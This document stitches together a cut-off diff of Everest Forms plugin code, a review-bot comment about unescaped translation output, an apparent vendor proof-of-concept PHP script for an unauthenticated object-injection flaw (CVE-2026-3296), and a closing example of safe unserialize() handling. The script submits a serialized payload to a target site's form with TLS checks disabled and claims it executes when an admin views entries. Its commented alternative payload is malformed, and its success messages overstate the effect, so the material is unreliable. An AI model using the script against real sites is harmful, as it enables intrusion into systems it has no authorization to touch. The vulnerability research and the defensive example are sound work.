-						'after'      => empty($everest_forms_ai_api_key) ? '<p class="desc">' . sprintf(esc_html__('To display all form fields, use the %s Smart Tag.', 'everest-forms'), '<code>{all_fields}</code>') . '</p>' : '<p class="desc">' . sprintf(esc_html__('To display all form fields, use the %1$s Smart Tag. Use %2$s Smart Tag for AI-generated emails', 'everest-forms'), '<code>{all_fields}</code>', '<code>{ai_email_response}</code>') . '</p>',
+						'after'      => empty( $everest_forms_ai_api_key ) ? '<p class="desc">' . sprintf( esc_html__( 'To display all form fields, use the %s Smart Tag.', 'everest-forms' ), '<code>{all_fields}</code>' ) . '</p>' : '<p class="desc">' . sprintf( esc_html__( 'To display all form fields, use the %1$s Smart Tag. Use %2$s Smart Tag for AI-generated emails', 'everest-forms' ), '<code>{all_fields}</code>', '<code>{ai_email_response}</code>' ) . '</p>',
 					)
 				);

-				do_action('everest_forms_inline_email_settings', $this, $connection_id);
+				do_action( 'everest_forms_inline_email_settings', $this, $connection_id );

 				echo '</div></div>';
 			}
@@ -642,28 +643,28 @@
 		 *
 		 * @since 3.4.0
 		 */
-		$this->form_data = evf_form_confirmation_backward_compatibility($this->form_data);
+		$this->form_data = evf_form_confirmation_backward_compatibility( $this->form_data );

 		echo '<div class="evf-content-section evf-content-confirmation-settings">';
 		echo '<h3 class="evf-content-section-title">';
-		esc_html_e('Form Confirmation', 'everest-forms');
+		esc_html_e( 'Form Confirmation', 'everest-forms' );
 		echo '</h3>';
 		echo '<div class="evf-confirmation-wrap everest-forms-border-container">';
 		echo '<h4 class="evf-content-section-title">';
-		esc_html_e('Confirmation Settings', 'everest-forms');
+		esc_html_e( 'Confirmation Settings', 'everest-forms' );
 		echo '</h4>';

-		$confirmation_type = isset($this->form_data['settings']['redirect_to']) ? $this->form_data['settings']['redirect_to'] : 'same';
-		$confirmation_type = '0' === (string)$confirmation_type ? 'same' : $confirmation_type;
+		$confirmation_type = isset( $this->form_data['settings']['redirect_to'] ) ? $this->form_data['settings']['redirect_to'] : 'same';
+		$confirmation_type = '0' === (string) $confirmation_type ? 'same' : $confirmation_type;

 		?>
 		<div id="everest-forms-panel-field-settings-redirect_to-wrap" class="everest-forms-panel-field evf-builder-radio  everest-forms-panel-field-radio">
-			<label for="everest-forms-panel-field-settings-redirect_to"><?php echo __('Confirmation Type', 'everest-forms'); ?>
-				<i title="<?php echo __('Choose the confirmation type', 'everest-forms'); ?>" class="dashicons dashicons-editor-help everest-forms-help-tooltip"></i>
+			<label for="everest-forms-panel-field-settings-redirect_to"><?php echo __( 'Confirmation Type', 'everest-forms' ); ?>
+				<i title="<?php echo __( 'Cho
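Review bot: the label and the `title` attribute in the last two lines still print translations with `echo __( ... )`, which is unescaped output; the reformat only adds spaces. Use `esc_html_e( 'Confirmation Type', 'everest-forms' )` for the label text and esc_attr_e() for the string inside `title="..."`, so a translation file cannot inject markup into the builder page.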

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3296 - Everest Forms <= 3.4.3 - Unauthenticated PHP Object Injection via Form Entry Metadata

/**
 * Everest Forms PHP Object Injection Proof of Concept
 * Targets: Everest Forms <= 3.4.3
 * Method: Unauthenticated form submission with serialized payload
 * Result: Arbitrary PHP code execution when admin views entries
 */

$target_url = 'https://vulnerable-site.com/'; // CHANGE THIS
$form_id = 1; // CHANGE THIS - target form ID

// Create a serialized PHP object payload
// This example uses a generic object injection chain
$payload = 'O:8:"stdClass":1:{s:4:"test";s:9:"INJECTION";}';

// Alternative: More dangerous payload using known POP chains
// $payload = 'O:20:"PHPSerializedPayload":1:{s:13:"command";s:10:"whoami";}';

// Prepare form submission data
$post_data = array(
    'everest_forms' => array(
        'form_id' => $form_id,
        'fields' => array(
            '1' => $payload // Inject into first form field
        )
    ),
    'everest_forms_id' => $form_id,
    'action' => 'everest_forms_submit'
);

// Initialize cURL
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'User-Agent: Atomic-Edge-PoC/1.0'
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code == 200) {
    echo "[+] Payload submitted successfully\n";
    echo "[+] The payload is now stored in the database\n";
    echo "[+] When an administrator views form entries, the payload will execute\n";
    echo "[+] Check: " . $target_url . "wp-admin/admin.php?page=evf-entries\n";
} else {
    echo "[-] Submission failed with HTTP code: " . $http_code . "\n";
    echo "[-] Response: " . substr($response, 0, 500) . "\n";
}

// Clean up
curl_close($ch);

// Note: Actual exploitation requires a valid PHP object injection chain
// This PoC demonstrates the injection vector only
?>
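
The defensive counterpart to the injection vector above, as an added example (not Everest Forms code and not the vendor's patch): a plain unserialize() call on a stored meta value runs a class's __wakeup(), while decoding with allowed_classes set to false instantiates nothing, and any value that still carries an object is handed back as raw text. DemoGadget, demo_has_object() and demo_safe_meta_decode() are hypothetical names, and the sample values are constructed.

```php
<?php
// Added example: not Everest Forms code. All names below are hypothetical.

// Stand-in for a class with a magic method, as an autoloaded gadget would have.
class DemoGadget {
    public static $woke = 0;
    public function __wakeup() { self::$woke++; }
}

// True when a decoded value is, or contains, an object of any kind.
function demo_has_object( $value ) {
    if ( is_object( $value ) || $value instanceof __PHP_Incomplete_Class ) {
        return true;
    }
    if ( is_array( $value ) ) {
        foreach ( $value as $item ) {
            if ( demo_has_object( $item ) ) {
                return true;
            }
        }
    }
    return false;
}

// Decode a stored meta value without instantiating any class. Values that are
// not serialized data, or that carry an object, come back as the raw string.
function demo_safe_meta_decode( $raw ) {
    if ( ! is_string( $raw ) || ! preg_match( '/^[aOCsidbN][:;]/', $raw ) ) {
        return $raw;
    }
    $value = @unserialize( $raw, array( 'allowed_classes' => false ) );
    if ( ( false === $value && 'b:0;' !== $raw ) || demo_has_object( $value ) ) {
        return $raw;
    }
    return $value;
}

// Constructed sample meta values: a checkbox-style array, plain text, an object.
$samples = array(
    'a:2:{i:0;s:3:"red";i:1;s:4:"blue";}',
    'plain text answer',
    'O:10:"DemoGadget":0:{}',
);

unserialize( $samples[2] );                 // vulnerable pattern: __wakeup() runs
$after_plain = DemoGadget::$woke;
$decoded     = array_map( 'demo_safe_meta_decode', $samples );
$after_safe  = DemoGadget::$woke - $after_plain;

var_dump( $after_plain, $after_safe, $decoded );
```

The two counters show how many times __wakeup() ran under each decoding path; the object-bearing sample stays a string in $decoded, so it can be escaped and displayed like any other field text.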
